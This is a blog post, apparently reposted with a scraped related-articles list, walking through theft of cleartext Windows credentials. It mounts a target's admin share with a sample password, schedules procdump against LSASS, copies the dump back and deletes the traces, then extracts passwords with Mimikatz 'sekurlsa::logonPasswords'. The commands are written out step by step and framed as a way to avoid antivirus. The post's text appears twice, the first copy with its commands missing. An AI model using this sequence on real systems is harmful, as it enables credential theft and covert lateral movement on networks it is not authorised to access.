Using Mimikatz Alpha or Getting Clear Text Passwords with a Microsoft Tool
2013-06-13 11:22
405 查看
Mimikatz is now built into Metasploit's meterpreter, you can do load mimikatz from the meterpreter prompt, but if you don't want to go through the hassle of dealing with AV, reverse or bind
payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz's alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS. The great thing about this technique is that
the only thing on disk is a Microsoft tool.
Mimikatz Minidump: http://blog.gentilkiwi.com/securite/mimikatz/minidump
Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Lets start. First we make sure our authentication works against the box and we can look inside of C$ (usually only admins can)
If that works then we want to check that we can all the "AT" command on the remote host:
All set. Next lets prep our workspace on the remote host. We are using the C:\Temp directory.
The contents of procdump.bat are:
I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also help me notice when I've dumped more than one IP that is actually the same host.
Next we schedule the task. Use net time to determine the local time for the remote machine.
Pull down the file and clean up:
On your side the only thing you need to make sure is that you are running Mimikatz on a similar version and architecture you pulled from. Use the following url for reference:http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png
Load up the Alpha version of Mimikatz, switch it to minidump mode and you're dumping creds:
Thats it. Password dumping without ever using a "Hacker" tool on target. Much love Microsoft. And even more to Mimikatz creator
@gentilkiwi - Benjamin Delpy for both this alpha release and changing his licensing to allow Mimikatz code to be integrated into Meterpreter.
Rob
Fuller |
1
Comment |
Share Article
https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
funny that the example given is
payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz's alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS. The great thing about this technique is that
the only thing on disk is a Microsoft tool.
Mimikatz Minidump: http://blog.gentilkiwi.com/securite/mimikatz/minidump
Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Lets start. First we make sure our authentication works against the box and we can look inside of C$ (usually only admins can)
net use \\TARGETBOX\C$ /user:DOMAIN\serviceaccount serviceaccount123 dir \\TARGETBOX\C$
If that works then we want to check that we can all the "AT" command on the remote host:
at \\TARGETBOX
All set. Next lets prep our workspace on the remote host. We are using the C:\Temp directory.
mkdir \\TARGETBOX\C$\Temp dir \\TARGETBOX\C$\Temp copy c:\temp\procdump.exe \\TARGETBOX\C$\ copy c:\temp\procdump.bat \\TARGETBOX\C$\
The contents of procdump.bat are:
@echo off C:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also help me notice when I've dumped more than one IP that is actually the same host.
Next we schedule the task. Use net time to determine the local time for the remote machine.
net time \\TARGETBOX at \\TARGETBOX 13:52 C:\Temp\procdump.bat
Pull down the file and clean up:
dir \\TARGETBOX\C$\Temp copy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\ rmdir /s \\TARGETBOX\C$\Temp
On your side the only thing you need to make sure is that you are running Mimikatz on a similar version and architecture you pulled from. Use the following url for reference:http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png
Load up the Alpha version of Mimikatz, switch it to minidump mode and you're dumping creds:
mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp Switch to MINIDUMP mimikatz # sekurlsa::logonPasswords full
Thats it. Password dumping without ever using a "Hacker" tool on target. Much love Microsoft. And even more to Mimikatz creator
@gentilkiwi - Benjamin Delpy for both this alpha release and changing his licensing to allow Mimikatz code to be integrated into Meterpreter.
Rob
Fuller |
1
Comment |
Share Article
Reader Comments (1)
you can even create minidump via PowerShell script =)https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
funny that the example given is
LSASSprocess ;)
相关文章推荐
- How to automate PowerPoint by using Visual C++ 5.0 or Visual C++ 6.0 with The Microsoft Foundation Classes
- Integrates Git with Sublime 3 to pull or push to Github by using Sublime plugin Git
- Grab a SQL Image data type with the Connector, ODBC or Microsofts ADO
- Using OpenLDAP with Microsoft SQL Server and Oracle Backend Databases
- Running LAPS Around Cleartext Passwords
- [Salesforce] Using the with sharing or without sharing Keywords
- errror with IBus blocks Keyboard input when using IntelliJ or Pycharm
- Quick tip: Using Excel with Microsoft Dynamics CRM(转)
- rails yaml with expression or variable (Using ERB in YAML Configuration File)
- iOS开发Post请求错误:Error Domain=NSCocoaErrorDomain Code=3840 "JSON text did not start with array or ...
- AFNetworking 关于JSON text did not start with array or object and option to allow fragments not set 错误
- Server 2008 R2: “You must use the Role Management Tool to install or configure Microsoft .NET”
- Error Domain=NSCocoaErrorDomain Code=3840 "JSON text did not start with array or object and option t
- SharePoint 2010: Export User Profile Properties to a Text File or Excel using PowerShell
- Using IP Instances with VLANs or How to Make a Few NICs Look Like Many
- Load Testing Web Applications using Microsoft’s Web Application Stress Tool
- Getting Started with FFmpeg/libav using NVIDIA GPUs
- push or get File or Folder using scp wrapped with expect and bash
- [转]Using the Microsoft Connector for Oracle by Attunity with SQL Server 2008 Integration Services
- Getting Started with Entity Framework 6 Code First using MVC 5--Contoso 大学